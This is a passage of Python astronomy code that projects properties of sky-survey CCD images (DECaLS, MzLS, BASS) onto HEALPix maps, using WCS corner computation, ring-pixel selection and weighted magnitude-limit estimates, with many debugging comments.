ip_low = ip_low % nr # in {0,nr-1}
ip_hi = ip_hi % nr # in {0,nr-1}
else:
# strict : include only pixels whose CENTER is in [phi_low, phi_hi]
ip_low = np.ceil (nr * phi_low / twopi - shift)
ip_hi = np.floor(nr * phi_hi / twopi - shift)
diff = (ip_low - ip_hi) % nr # in {-nr+1,nr-1}
if (diff < 0):
diff = diff + nr # in {0,nr-1}
if (ip_low >= nr):
ip_low = ip_low - nr
if (ip_hi < 0 ):
ip_hi = ip_hi + nr
#print ip_hi-ip_low,nr
if phi_low <= 0.0 and phi_hi >= 2.0*np.pi:
ip_low = 0
ip_hi = nr - 1
if (ip_low > ip_hi):
to_top = True
else:
to_top = False
ip_low = int( ip_low + ipix1 )
ip_hi = int( ip_hi + ipix1 )
ipix1 = int(ipix1)
if (to_top):
nir1 = int( ipix2 - ip_low + 1 )
nir2 = int( ip_hi - ipix1 + 1 )
nir = int( nir1 + nir2 )
if ((nir1 > 0) and (nir2 > 0)):
listir = np.concatenate( (np.arange(ipix1, nir2+ipix1), np.arange(ip_low, nir1+ip_low) ) )
else:
if nir1 == 0:
listir = np.arange(ipix1, nir2+ipix1)
if nir2 == 0:
listir = np.arange(ip_low, nir1+ip_low)
else:
nir = int(ip_hi - ip_low + 1 )
listir = np.arange(ip_low, nir+ip_low)
#below added by AJR to address region around ra = 360
if float(listir[-1]-listir[0])/(ipix2-ipix1) > .5:
listir1 = np.arange(ipix1, listir[0]+1)
listir2 = np.arange(listir[-1], ipix2+1)
# #print listir[-1],listir[0],ipix1,ipix2,len(listir1),len(listir2)
listir = np.concatenate( (listir1,listir2 ) )
#print len(listir)
return listir
# ---------------------------------------------------------------------------------------- #
# Linear interpolation
def lininterp(xval, xA, yA, xB, yB):
slope = (yB-yA) / (xB-xA)
yval = yA + slope * (xval - xA)
return yval
# ---------------------------------------------------------------------------------------- #
# Test if val beints to interval [b1, b2]
def inInter(val, b1, b2):
if b1 <= b2:
return np.logical_and( val <= b2, val >= b1 )
else:
return np.logical_and( val <= b1, val >= b2 )
# ---------------------------------------------------------------------------------------- #
# Test if a list of (theta,phi) values below to a region defined by its corners (theta,phi) for Left, Right, Bottom, Upper
def in_region(thetavals, phivals, thetaU, phiU, thetaR, phiR, thetaL, phiL, thetaB, phiB):
npts = len(thetavals)
phis = np.ndarray( (npts, 4) )
thetas = np.ndarray( (npts, 4) )
inds_phi = np.ndarray( (npts, 4), dtype=bool )
inds_phi[:,:] = False
inds_theta = np.ndarray( (npts, 4), dtype=bool )
inds_theta[:,:] = False
if thetaU != thetaB:
phis[:,0] = lininterp(thetavals, thetaB, phiB, thetaU, phiU)
inds_phi[:,0] = inInter(thetavals, thetaB, thetaU)
if thetaL != thetaU:
phis[:,1] = lininterp(thetavals, thetaU, phiU, thetaL, phiL)
inds_phi[:,1] = inInter(thetavals, thetaU, thetaL)
inds_phi[phis[:,0]==phis[:,1],1] = False
if thetaL != thetaR:
phis[:,2] = lininterp(thetavals, thetaL, phiL, thetaR, phiR)
inds_phi[:,2] = inInter(thetavals, thetaL, thetaR)
inds_phi[phis[:,0]==phis[:,2],2] = False
inds_phi[phis[:,1]==phis[:,2],2] = False
if thetaR != thetaB:
phis[:,3] = lininterp(thetavals, thetaR, phiR, thetaB, phiB)
inds_phi[:,3] = inInter(thetavals, thetaR, thetaB)
inds_phi[phis[:,0]==phis[:,3],3] = False
inds_phi[phis[:,1]==phis[:,3],3] = False
inds_phi[phis[:,2]==phis[:,3],3] = False
if phiU != phiB:
thetas[:,0] = lininterp(phivals, phiB, thetaB, phiU, thetaU)
inds_theta[:,0] = inInter(phivals, phiB, phiU)
if phiL != phiU:
thetas[:,1] = lininterp(phivals, phiU, thetaU, phiL, thetaL)
inds_theta[:,1] = inInter(phivals, phiU, phiL)
inds_theta[thetas[:,0]==thetas[:,1],1] = False
if phiL != phiR:
thetas[:,2] = lininterp(phivals, phiL, thetaL, phiR, thetaR)
inds_theta[:,2] = inInter(phivals, phiL, phiR)
inds_theta[thetas[:,0]==thetas[:,2],2] = False
inds_theta[thetas[:,1]==thetas[:,2],2] = False
if phiR != phiB:
thetas[:,3] = lininterp(phivals, phiR, thetaR, phiB, thetaB)
inds_theta[:,3] = inInter(phivals, phiR, phiB)
inds_theta[thetas[:,0]==thetas[:,3],3] = False
inds_theta[thetas[:,1]==thetas[:,3],3] = False
inds_theta[thetas[:,2]==thetas[:,3],3] = False
ind = np.where(np.logical_and(inds_phi[:,:].sum(axis=1)>1, inds_theta[:,:].sum(axis=1)>1))[0]
res = np.ndarray( (npts, ), dtype=bool )
res[:] = False
for i in ind:
phival = phivals[i]
thetaval = thetavals[i]
phis_loc = phis[i,inds_phi[i,:]]
thetas_loc = thetas[i,inds_theta[i,:]]
res[i] = (phival >= phis_loc[0]) & (phival <= phis_loc[1]) & (thetaval >= thetas_loc[0]) & (thetaval <= thetas_loc[1])
return res
# ---------------------------------------------------------------------------------------- #
# Computes healpix pixels of propertyArray.
# pixoffset is the number of pixels to truncate on the edges of each ccd image.
# ratiores is the super-resolution factor, i.e. the edges of each ccd image are processed
# at resultion 4*nside and then averaged at resolution nside.
#def computeHPXpix_sequ_new(nside, propertyArray, pixoffset=0, ratiores=4, coadd_cut=True):
def computeHPXpix_sequ_new(nside, propertyArray, pixoffset=0, ratiores=4, coadd_cut=False):
#return 'ERROR'
#img_ras, img_decs = [propertyArray[v] for v in ['ra0', 'ra1', 'ra2','ra3']],[propertyArray[v] for v in ['dec0', 'dec1', 'dec2','dec3']]
#x = [1+pixoffset, propertyArray['NAXIS1']-pixoffset, propertyArray['NAXIS1']-pixoffset, 1+pixoffset, 1+pixoffset]
#y = [1+pixoffset, 1+pixoffset, propertyArray['NAXIS2']-pixoffset, propertyArray['NAXIS2']-pixoffset, 1+pixoffset]
#if np.any(img_ras > 360.0):
# img_ras[img_ras > 360.0] -= 360.0
#if np.any(img_ras < 0.0):
# img_ras[img_ras < 0.0] += 360.0
#print 'in here'
#print len(img_ras)#,len(img_ras[0])
#plt.plot(img_ras[0],img_decs[0],'k,')
#plt.show()
img_ras, img_decs = computeCorners_WCS_TPV(propertyArray, pixoffset)
#DEBUGGING - MARCM
#print "debugging img_ras img_decs", img_ras
#for i in range(0,len(img_ras)):
# if img_ras[i] > 360.:
# img_ras[i] -= 360.
# if img_ras[i] < 0.:
# img_ras[i] += 360.
#END DEBUGGING MARCM BIT
# Coordinates of coadd corners
# RALL, t.DECLL, t.RAUL, t.DECUL, t.RAUR, t.DECUR, t.RALR, t.DECLR, t.URALL, t.UDECLL, t.URAUR, t.UDECUR
if coadd_cut:
#coadd_ras = [propertyArray[v] for v in ['URAUL', 'URALL', 'URALR', 'URAUR']]
#coadd_decs = [propertyArray[v] for v in ['UDECUL', 'UDECLL', 'UDECLR', 'UDECUR']]
coadd_ras = [propertyArray[v] for v in ['ra0', 'ra1', 'ra2', 'ra3']]
coadd_decs = [propertyArray[v] for v in ['dec0', 'dec1', 'dec2', 'dec3']]
coadd_phis = np.multiply(coadd_ras, np.pi/180)
coadd_thetas = np.pi/2 - np.multiply(coadd_decs, np.pi/180)
else:
coadd_phis = 0.0
coadd_thetas = 0.0
# Coordinates of image corners
#print img_ras
img_phis = np.multiply(img_ras , np.pi/180)
img_thetas = np.pi/2 - np.multiply(img_decs , np.pi/180)
img_pix = hp.ang2pix(nside, img_thetas, img_phis, nest=False)
pix_thetas, pix_phis = hp.pix2ang(nside, img_pix, nest=False)
# DEBUGGING - MARCM
#print 'pix_thetas', pix_thetas
#print 'pix_phis', pix_phis
#sys.exit()
#img_phis = np.mod( img_phis + np.pi, 2*np.pi ) # Enable these two lines to rotate everything by 180 degrees
#coadd_phis = np.mod( coadd_phis + np.pi, 2*np.pi ) # Enable these two lines to rotate everything by 180 degrees
# MARCM patch to correct a bug from Boris which didn't get bass and mzls ccds corners properly oriented.
# This patch is not necesarily comprehensive; not pairing may not cover all cases
# In addition it also needs checking what hapens around phi=0
dph01=abs(img_phis[0]-img_phis[1])
dph12=abs(img_phis[1]-img_phis[2])
if (dph01 < dph12) :
if (img_phis[1] < img_phis[2]):
if(img_thetas[0] < img_thetas[1]):
# this was original bit
#print "This is DECaLS"
ind_U = 0
ind_L = 2
ind_R = 3
ind_B = 1
else:
# This is for MzLS (seems to rotate other way)
#print "This is MzLS"
ind_U = 1
ind_L = 3
ind_R = 2
ind_B = 0
# print "Probably wrong indexing of ccd corner AAA"
else:
# This is addes for BASS
#print "This is for BASS"
if(img_thetas[0] > img_thetas[1]):
ind_U = 2
ind_L = 0
ind_R = 1
ind_B = 3
else:
# Few o(100) ccd of DECaLS z-band fall here; not clear what to do on them
#ind_U = 3
#ind_L = 1
#ind_R = 0
#ind_B = 2
ind_U = 0
ind_L = 2
ind_R = 3
ind_B = 1
else:
print("WARNING: (MARCM:) Current ccd image may have wrong corner assignments in quicksip")
#raise ValueError("(MARCM:) probably wrong assignment of corner values in quicksip")
#ind_U = 0
#ind_L = 2
#ind_R = 3
#ind_B = 1
ind_U = 3
ind_L = 1
ind_R = 0
ind_B = 2
ipix_list = np.zeros(0, dtype=int)
weight_list = np.zeros(0, dtype=float)
# loop over rings until reached bottom
iring_U = ring_num(nside, np.cos(img_thetas.min()), shift=0)
iring_B = ring_num(nside, np.cos(img_thetas.max()), shift=0)
ipixs_ring = []
pmax = np.max(img_phis)
pmin = np.min(img_phis)
if (pmax - pmin > np.pi):
ipixs_ring = np.int64(np.concatenate([in_ring(nside, iring, pmax, pmin, conservative=True) for iring in range(iring_U-1, iring_B+1)]))
else:
ipixs_ring = np.int64(np.concatenate([in_ring(nside, iring, pmin, pmax, conservative=True) for iring in range(iring_U-1, iring_B+1)]))
ipixs_nest = hp.ring2nest(nside, ipixs_ring)
npixtot = hp.nside2npix(nside)
if ratiores > 1:
subipixs_nest = np.concatenate([np.arange(ipix*ratiores**2, ipix*ratiores**2+ratiores**2, dtype=np.int64) for ipix in ipixs_nest])
nsubpixperpix = ratiores**2
else:
subipixs_nest = ipixs_nest
nsubpixperpix = 1
rangepix_thetas, rangepix_phis = hp.pix2ang(nside*ratiores, subipixs_nest, nest=True)
#subipixs_ring = hp.ang2pix(nside*ratiores, rangepix_thetas, rangepix_phis, nest=False).reshape(-1, nsubpixperpix)
if (pmax - pmin > np.pi) or (np.max(coadd_phis) - np.min(coadd_phis) > np.pi):
#DEBUGGING - MARCM
#print "Eps debugging"
img_phis= np.mod( img_phis + np.pi, 2*np.pi )
coadd_phis= np.mod( coadd_phis + np.pi, 2*np.pi )
rangepix_phis = np.mod( rangepix_phis + np.pi, 2*np.pi )
subweights = in_region(rangepix_thetas, rangepix_phis,
img_thetas[ind_U], img_phis[ind_U], img_thetas[ind_L], img_phis[ind_L],
img_thetas[ind_R], img_phis[ind_R], img_thetas[ind_B], img_phis[ind_B])
# DEBUGGING - MARCM
#print 'pmax pmin', pmax, pmin
#print 'img_thetas again', img_thetas
#print 'img_phis again', img_phis
#print 'rangepix_phis', rangepix_phis
#print 'rangepix_theta', rangepix_thetas
#print 'subweights', subweights
if coadd_cut:
subweights_coadd = in_region(rangepix_thetas, rangepix_phis,
coadd_thetas[ind_U], coadd_phis[ind_U], coadd_thetas[ind_L], coadd_phis[ind_L],
coadd_thetas[ind_R], coadd_phis[ind_R], coadd_thetas[ind_B], coadd_phis[ind_B])
resubweights = np.logical_and(subweights, subweights_coadd).reshape(-1, nsubpixperpix)
else:
resubweights = subweights.reshape(-1, nsubpixperpix)
sweights = resubweights.sum(axis=1) / float(nsubpixperpix)
ind = (sweights > 0.0)
# DEBUGGING - MARCM
#print 'ind', ind
#print 'ipixs_ring', ipixs_ring
return ipixs_ring[ind], sweights[ind], img_thetas, img_phis, resubweights[ind,:]
def computeHPXpix_sequ_new_simp(nside, propertyArray):
#return 'ERROR'
#Hack by AJR and MarcM, just return all of the pixel centers within the ra,dec range
img_ras, img_decs = [propertyArray[v] for v in ['ra0', 'ra1', 'ra2','ra3']],[propertyArray[v] for v in ['dec0', 'dec1', 'dec2','dec3']]
#print min(img_ras),max(img_ras)
#more efficient version below failed for some reason
#iweird = 0
for i in range(0,len(img_ras)):
if img_ras[i] > 360.:
img_ras[i] -= 360.
if img_ras[i] < 0.:
img_ras[i] += 360.
#if max(img_ras) - min(img_ras) > 1.:
# print img_ras,img_decs
#if np.any(img_ras > 360.0):
# img_ras[img_ras > 360.0] -= 360.0
#if np.any(img_ras < 0.0):
# img_ras[img_ras < 0.0] += 360.0
# Coordinates of image corners
#print img_ras
img_phis = np.multiply(img_ras , np.pi/180.)
img_thetas = np.pi/2. - np.multiply(img_decs , np.pi/180.)
img_pix = hp.ang2pix(nside, img_thetas, img_phis, nest=False)
pix_thetas, pix_phis = hp.pix2ang(nside, img_pix, nest=False)
ipix_list = np.zeros(0, dtype=int)
# loop over rings until reached bottom
iring_U = ring_num(nside, np.cos(img_thetas.min()), shift=0)
iring_B = ring_num(nside, np.cos(img_thetas.max()), shift=0)
ipixs_ring = []
pmax = np.max(img_phis)
pmin = np.min(img_phis)
if pmax-pmin == 0:
return []
p1 = pmin
p2 = pmax
if pmin < .1 and pmax > 1.9*np.pi:
#straddling line
#img_phis.sort()
for i in range(0,len(img_phis)):
if img_phis[i] > p1 and img_phis[i] < np.pi:
p1 = img_phis[i]
if img_phis[i] < p2 and img_phis[i] > np.pi:
p2 = img_phis[i]
#print 'kaka', img_phis, img_ras
#print 'kaka', p1, p2, iring_U, iring_B
ipixs_ring1 = np.int64(np.concatenate([in_ring(nside, iring, 0, p1, conservative=False) for iring in range(iring_U, iring_B+1)]))
ipixs_ring2 = np.int64(np.concatenate([in_ring(nside, iring, p2, 2.*np.pi, conservative=False) for iring in range(iring_U, iring_B+1)]))
#ipixs_ring1 = np.int64(np.concatenate([in_ring_simp(nside, iring, 0, p1, conservative=False) for iring in range(iring_U, iring_B+1)]))
#ipixs_ring2 = np.int64(np.concatenate([in_ring_simp(nside, iring, p2, 2.*np.pi, conservative=False) for iring in range(iring_U, iring_B+1)]))
ipixs_ring = np.concatenate((ipixs_ring1,ipixs_ring2))
# print len(ipixs_ring),len(ipixs_ring1),len(ipixs_ring2),iring_B-iring_U,pmin,pmax,p1,p2
#
if len(ipixs_ring1) > 1000:
print( 'kaka1', p1, iring_U, iring_B)
if len(ipixs_ring2) > 1000:
print( 'kaka2', p2, iring_U, iring_B)
else:
ipixs_ring = np.int64(np.concatenate([in_ring(nside, iring, p1, p2, conservative=False) for iring in range(iring_U, iring_B+1)]))
#ipixs_ring = np.int64(np.concatenate([in_ring_simp(nside, iring, p1, p2, conservative=False) for iring in range(iring_U, iring_B+1)]))
if len(ipixs_ring) > 1000:
#print 'hey', img_ras,img_decs
print( 'careful', len(ipixs_ring),iring_B-iring_U,pmin,pmax,p1,p2)
#nwrong = nwrong +1
return [] #temporary fix
# print len(ipixs_ring),iring_B-iring_U,pmin,pmax,min(img_ras),max(img_ras)
#print len(ipixs_ring),iring_B-iring_U,pmin,pmax,min(img_ras),max(img_ras)
return ipixs_ring
# ---------------------------------------------------------------------------------------- #
# Crucial routine: read properties of a ccd image and returns its corners in ra dec.
# pixoffset is the number of pixels to truncate on the edges of each ccd image.
def computeCorners_WCS_TPV(propertyArray, pixoffset):
#x = [1+pixoffset, propertyArray['NAXIS1']-pixoffset, propertyArray['NAXIS1']-pixoffset, 1+pixoffset, 1+pixoffset]
#y = [1+pixoffset, 1+pixoffset, propertyArray['NAXIS2']-pixoffset, propertyArray['NAXIS2']-pixoffset, 1+pixoffset]
x = [1+pixoffset, propertyArray['width']-pixoffset, propertyArray['width']-pixoffset, 1+pixoffset, 1+pixoffset]
y = [1+pixoffset, 1+pixoffset, propertyArray['height']-pixoffset, propertyArray['height']-pixoffset, 1+pixoffset]
#ras, decs = xy2radec(x, y, propertyArray)
ras, decs = xy2radec_nopv(x, y, propertyArray)
return ras, decs
# ---------------------------------------------------------------------------------------- #
# Performs WCS inverse projection to obtain ra dec from ccd image information.
def xy2radec(x, y, propertyArray):
crpix = np.array( [ propertyArray['CRPIX1'], propertyArray['CRPIX2'] ] )
cd = np.array( [ [ propertyArray['CD1_1'], propertyArray['CD1_2'] ],
[ propertyArray['CD2_1'], propertyArray['CD2_2'] ] ] )
pv1 = [ float(propertyArray['PV1_'+str(k)]) for k in range(11) if k != 3 ] # if k != 3
pv2 = [ float(propertyArray['PV2_'+str(k)]) for k in range(11) if k != 3 ] # if k != 3
pv = np.array( [ [ [ pv1[0], pv1[2], pv1[5], pv1[9] ],
[ pv1[1], pv1[4], pv1[8], 0. ],
[ pv1[3], pv1[7], 0. , 0. ],
[ pv1[6], 0. , 0. , 0. ] ],
[ [ pv2[0], pv2[1], pv2[3], pv2[6] ],
[ pv2[2], pv2[4], pv2[7], 0. ],
[ pv2[5], pv2[8], 0. , 0. ],
[ pv2[9], 0. , 0. , 0. ] ] ] )
center_ra = propertyArray['CRVAL1'] * np.pi / 180.0
center_dec = propertyArray['CRVAL2'] * np.pi / 180.0
ras, decs = radec_gnom(x, y, center_ra, center_dec, cd, crpix, pv)
ras = np.multiply( ras, 180.0 / np.pi )
decs = np.multiply( decs, 180.0 / np.pi )
if np.any(ras > 360.0):
ras[ras > 360.0] -= 360.0
if np.any(ras < 0.0):
ras[ras < 0.0] += 360.0
return ras, decs
def xy2radec_nopv(x, y, propertyArray):
crpix = np.array( [ propertyArray['crpix1'], propertyArray['crpix2'] ] )
cd = np.array( [ [ propertyArray['cd1_1'], propertyArray['cd1_2'] ],
[ propertyArray['cd2_1'], propertyArray['cd2_2'] ] ] )
center_ra = propertyArray['crval1'] * np.pi / 180.0
center_dec = propertyArray['crval2'] * np.pi / 180.0
ras, decs = radec_gnom(x, y, center_ra, center_dec, cd, crpix, pv=False)
ras = np.multiply( ras, 180.0 / np.pi )
decs = np.multiply( decs, 180.0 / np.pi )
if np.any(ras > 360.0):
ras[ras > 360.0] -= 360.0
if np.any(ras < 0.0):
ras[ras < 0.0] += 360.0
return ras, decs
# ---------------------------------------------------------------------------------------- #
# Deproject into ra dec values
def deproject_gnom(u, v, center_ra, center_dec):
u *= arcsec_to_radians
v *= arcsec_to_radians
rsq = u*u + v*v
cosc = sinc_over_r = 1./np.sqrt(1.+rsq)
cosdec = np.cos(center_dec)
sindec = np.sin(center_dec)
sindec = cosc * sindec + v * sinc_over_r * cosdec
tandra_num = -u * sinc_over_r
tandra_denom = cosc * cosdec - v * sinc_over_r * sindec
dec = np.arcsin(sindec)
ra = center_ra + np.arctan2(tandra_num, tandra_denom)
return ra, dec
# ---------------------------------------------------------------------------------------- #
def radec_gnom(x, y, center_ra, center_dec, cd, crpix, pv):
p1 = np.array( [ np.atleast_1d(x), np.atleast_1d(y) ] )
p2 = np.dot(cd, p1 - crpix[:,np.newaxis])
u = p2[0]
v = p2[1]
if pv:
usq = u*u
vsq = v*v
ones = np.ones(u.shape)
upow = np.array([ ones, u, usq, usq*u ])
vpow = np.array([ ones, v, vsq, vsq*v ])
temp = np.dot(pv, vpow)
p2 = np.sum(upow * temp, axis=1)
u = - p2[0] * degree_to_arcsec
v = p2[1] * degree_to_arcsec
else:
u = -u * degree_to_arcsec
v = v * degree_to_arcsec
ra, dec = deproject_gnom(u, v, center_ra, center_dec)
return ra, dec
# ---------------------------------------------------------------------------------------- #
# Class for a pixel of the map, containing trees of images and values
class NDpix_simp:
def __init__(self, propertyArray_in):
self.nbelem = 1
self.ratiores = 1
self.propertyArray = [propertyArray_in]
def addElem(self, propertyArray_in):
self.nbelem += 1
self.propertyArray.append(propertyArray_in)
# Project NDpix into a single number
# for a given property and operation applied to its array of images
def project(self, property, weights, operation):
asperpix = 0.263
A = np.pi*(1.0/asperpix)**2
pis = np.array([1.0 for proparr in self.propertyArray])
# No super-resolution or averaging
vals = np.array([proparr[property] for proparr in self.propertyArray])
if operation == 'mean':
return np.mean(vals)
if operation == 'median':
return np.median(vals)
if operation == 'total':
return np.sum(vals)
if operation == 'min':
return np.min(vals)
if operation == 'max':
return np.max(vals)
if operation == 'maxmin':
return np.max(vals) - np.min(vals)
if operation == 'fracdet':
return 1.0
if operation == 'num':
return len(vals)
# Class for a pixel of the map, containing trees of images and values
class NDpix:
def __init__(self, propertyArray_in, inweights, ratiores):
self.ratiores = ratiores
self.nbelem = 1
self.propertyArray = [propertyArray_in]
if self.ratiores > 1:
self.weights = np.array([inweights])
def addElem(self, propertyArray_in, inweights):
self.nbelem += 1
self.propertyArray.append(propertyArray_in)
if self.ratiores > 1:
self.weights = np.vstack( (self.weights, inweights) )
# Project NDpix into a single number
# for a given property and operation applied to its array of images
def project(self, property, weights, operation):
asperpix = 0.263
A = np.pi*(1.0/asperpix)**2
# Computes COADD weights
if weights == 'coaddweights3' or weights == 'coaddweights2' or weights == 'coaddweights' or property == 'maglimit2' or property == 'maglimit' or property == 'maglimit3' or property == 'sigmatot':
m_zpi = np.array([proparr['MAGZP'] for proparr in self.propertyArray])
if property == 'sigmatot':
m_zp = np.array([30.0 for proparr in self.propertyArray])
else:
m_zp = np.array([proparr['COADD_MAGZP'] for proparr in self.propertyArray])
if weights == 'coaddweights' or property == 'maglimit':
sigma_bgi = np.array([
1.0/np.sqrt((proparr['WEIGHTA']+proparr['WEIGHTB'])/2.0)
if (proparr['WEIGHTA']+proparr['WEIGHTB']) >= 0.0 else proparr['SKYSIGMA']
for proparr in self.propertyArray])
if weights == 'coaddweights2' or property == 'maglimit2':
sigma_bgi = np.array([
0.5/np.sqrt(proparr['WEIGHTA'])+0.5/np.sqrt(proparr['WEIGHTB'])
if (proparr['WEIGHTA']+proparr['WEIGHTB']) >= 0.0 else proparr['SKYSIGMA']
for proparr in self.propertyArray])
if weights == 'coaddweights3' or property == 'maglimit3' or property == 'sigmatot':
sigma_bgi = np.array([proparr['SKYSIGMA'] for proparr in self.propertyArray])
sigpis = 100**((m_zpi-m_zp)/5.0)
mspis = (sigpis/sigma_bgi)**2.0
pis = (sigpis/sigma_bgi)**2.0
elif weights == 'invsqrtexptime':
pis = np.array([ 1.0 / np.sqrt(proparr['EXPTIME']) for proparr in self.propertyArray])
else:
pis = np.array([1.0 for proparr in self.propertyArray])
pis = np.divide(pis, pis.mean())
# No super-resolution or averaging
if self.ratiores == 1:
if property == 'count':
vals = np.array([1.0 for proparr in self.propertyArray])
elif property == 'sigmatot':
return np.sqrt(1.0 / mspis.sum())
elif property == 'maglimit3' or property == 'maglimit2' or property == 'maglimit':
sigma2_tot = 1.0 / mspis.sum()
return np.mean(m_zp) - 2.5*np.log10(10*np.sqrt(A*sigma2_tot) )
else:
vals = np.array([proparr[property] for proparr in self.propertyArray])
vals = vals * pis
if operation == 'mean':
return np.mean(vals)
if operation == 'median':
return np.median(vals)
if operation == 'total':
return np.sum(vals)
if operation == 'min':
return np.min(vals)
if operation == 'max':
return np.max(vals)
if operation == 'maxmin':
return np.max(vals) - np.min(vals)
if operation == 'fracdet':
return 1.0
if operation == 'num':
return len(vals)
# Retrieve property array and apply operation (with super-resolution)
if property == 'count':
vals = np.array([1.0 for proparr in self.propertyArray])
elif property == 'maglimit2' or property == 'maglimit' or property == 'maglimit3' or property == 'sigmatot':
vals = (sigpis/sigma_bgi)**2
else:
#print property
vals = np.array([proparr[property] for proparr in self.propertyArray])
vals = vals * pis
theweights = self.weights
weightedarray = (theweights.T * vals).T
counts = (theweights.T * pis).sum(axis=1)
ind = counts > 0
if property == 'maglimit' or property == 'maglimit2' or property == 'maglimit3':
sigma2_tot = 1.0 / weightedarray.sum(axis=0)
maglims = np.mean(m_zp) - 2.5*np.log10(10*np.sqrt(A*sigma2_tot) )
return maglims[ind].mean()
if property == 'sigmatot':
sigma2_tot = 1.0 / weightedarray.sum(axis=0)
return np.sqrt(sigma2_tot)[ind].mean()
if operation == 'min':
return np.min(vals)
if operation == 'max':
return np.max(vals)
if operation == 'maxmin':
return np.max(vals) - np.min(vals)
if operation == 'mean':
return (weightedarray.sum(axis=0) / counts)[ind].mean()
if operation == 'median':
return np.ma.median(np.ma.array(weightedarray, mask=np.logical_not(theweights)), axis=0)[ind].mean()
if operation == 'total':
return weightedarray.sum(axis=0)[ind].mean()
if operation == 'fracdet':
temp = weightedarray.sum(axis=0)
return temp[ind].size / float(temp.size)
if operation == 'num':
return len(vals)
# ---------------------------------------------------------------------------------------- #
# Project NDpix into a value
def projectNDpix(args):
pix, property, weights, operation = args
if pix != 0:
return pix.project(self, property, weights, operation)
else:
return hp.UNSEEN
# Create a "healtree", i.e. a set of pixels with trees of images in them.
def makeHealTree(args):
samplename, nside, ratiores, pixoffset, tbdata = args
treemap = HealTree(nside)
verbcount = 1000
count = 0
start = time.time()
duration = 0
if(verbose): print( '>', samplename, ': starting tree making')
for i, propertyArray in enumerate(tbdata):
count += 1
start_one = time.time()
# DEBUGGING - MARCM
#print "debugging i ", i
treemap.addElem(propertyArray, ratiores, pixoffset)
end_one = time.time()
duration += float(end_one - start_one)
if count == verbcount:
if(verbose): print( '>', samplename, ': processed images', i-verbcount+1, '-', i+1, '(on '+str(len(tbdata))+') in %.2f' % duration, 'sec (~ %.3f' % (duration/float(verbcount)), 'per image)')
count = 0
duration = 0
end = time.time()
if(verbose): print('>', samplename, ': tree making took : %.2f' % float(end - start), 'sec for', len(tbdata), 'images')
return treemap
def makeHealTree_simp(args):
#hack by AJR
samplename, nside, tbdata = args
treemap = HealTree(nside)
verbcount = 1000
count = 0
start = time.time()
duration = 0
if(verbose): print( '>', samplename, ': starting tree making')
for i, propertyArray in enumerate(tbdata):
count += 1
start_one = time.time()
treemap.addElem_simp(propertyArray)
end_one = time.time()
duration += float(end_one - start_one)
if count == verbcount:
if(verbose): print( '>', samplename, ': processed images', i-verbcount+1, '-', i+1, '(on '+str(len(tbdata))+') in %.2f' % duration, 'sec (~ %.3f' % (duration/float(verbcount)), 'per image)')
count = 0
duration = 0
end = time.time()
if(verbose): print( '>', samplename, ': tree making took : %.2f' % float(end - start), 'sec for', len(tbdata), 'images')
return treemap
# ---------------------------------------------------------------------------------------- #
# Class for multi-dimensional healpix map that can be
# created and processed in parallel.
class HealTree:
# Initialise and create array of pixels
def __init__(self, nside):
self.nside = nside
self.npix = 12*nside**2
self.pixlist = np.zeros(self.npix, dtype=object)
# Process image and absorb its properties
def addElem(self, propertyArray, ratiores, pixoffset):
# Retrieve pixel indices
ipixels, weights, thetas_c, phis_c, subpixrings = computeHPXpix_sequ_new(self.nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
# DEBUGGING - MARCM
#print "deguging ipix addElem", ipixels
# For each pixel, absorb image properties
for ii, (ipix, weight) in enumerate(zip(ipixels, weights)):
if self.pixlist[ipix] == 0:
self.pixlist[ipix] = NDpix(propertyArray, subpixrings[ii,:], ratiores)
else:
self.pixlist[ipix].addElem(propertyArray, subpixrings[ii,:])
def addElem_simp(self, propertyArray):
#AJR hack
# Retrieve non-conservative pixel indices, no oversampling, just the pixels with centers in the CCD
ipixels = computeHPXpix_sequ_new_simp(self.nside, propertyArray)
# For each pixel, absorb image properties
#if ipixels == -1:
# return True
#if len(i
for ipix in ipixels:
if self.pixlist[ipix] == 0:
self.pixlist[ipix] = NDpix_simp(propertyArray)
else:
self.pixlist[ipix].addElem(propertyArray)
# Project HealTree into partial Healpix map
# for a given property and operation applied to its array of images
def project_partial(self, property, weights, operation, pool=None):
ind = np.where(self.pixlist != 0)
pixel = np.arange(self.npix)[ind]
verbcount = pixel.size / 10
count = 0
start = time.time()
duration = 0
signal = np.zeros(pixel.size)
for i, pix in enumerate(self.pixlist[ind]):
count += 1
start_one = time.time()
signal[i] = pix.project(property, weights, operation)
end_one = time.time()
duration += float(end_one - start_one)
if count == verbcount:
if(verbose): print( '>', property, weights, operation, ': processed pixels', i-verbcount+1, '-', i+1, '(on '+str(pixel.size)+') in %.1e' % duration, 'sec (~ %.1e' % (duration/float(verbcount)), 'per pixel)')
count = 0
duration = 0
end = time.time()
print( '> Projection', property, weights, operation, ' took : %.2f' % float(end - start), 'sec for', pixel.size, 'pixels')
#signal = [pix.project(property, weights, operation) for pix in self.pixlist[ind]]
return pixel, signal
# Project HealTree into regular Healpix map
# for a given property and operation applied to its array of images
def project(self, property, weights, operation, pool=None):
outmap = np.zeros(self.npix)
outmap.fill(hp.UNSEEN)
if pool is None:
for ipix, pix in enumerate(self.pixlist):
if pix != 0:
outmap[ipix] = pix.project(property, weights, operation)
else:
outmap = np.array( pool.map( projectNDpix, [ (pix, property, weights, operation) for pix in self.pixlist ] ) )
return outmap
# ---------------------------------------------------------------------------------------- #
def makeHpxMap(args):
healtree, property, weights, operation = args
return healtree.project(property, weights, operation)
# ---------------------------------------------------------------------------------------- #
def makeHpxMap_partial(args):
healtree, property, weights, operation = args
return healtree.project_partial(property, weights, operation)
# ---------------------------------------------------------------------------------------- #
def addElemHealTree(args):
healTree, propertyArray, ratiores = args
healTree.addElem(propertyArray, ratiores)
# ---------------------------------------------------------------------------------------- #
# Process image and absorb its properties
def addElem(args):
iarr, tbdatadtype, propertyArray, nside, propertiesToKeep, ratiores = args
propertyArray.dtype = tbdatadtype
if(verbose): print( 'Processing image', iarr, propertyArray['RA'])
# Retrieve pixel indices
ipixels, weights, thetas_c, phis_c = computeHPXpix_sequ_new(nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
print( 'Processing image', iarr, thetas_c, phis_c)
# For each pixel, absorb image properties
for ipix, weight in zip(ipixels, weights):
if globalTree[ipix] == 0:
globalTree[ipix] = NDpix(propertyArray, propertiesToKeep, weight=weight)
else:
globalTree[ipix].addElem(propertyArray, propertiesToKeep, weight=weight)
# ---------------------------------------------------------------------------------------- #
# Read and project a Healtree into Healpix maps, and write them.
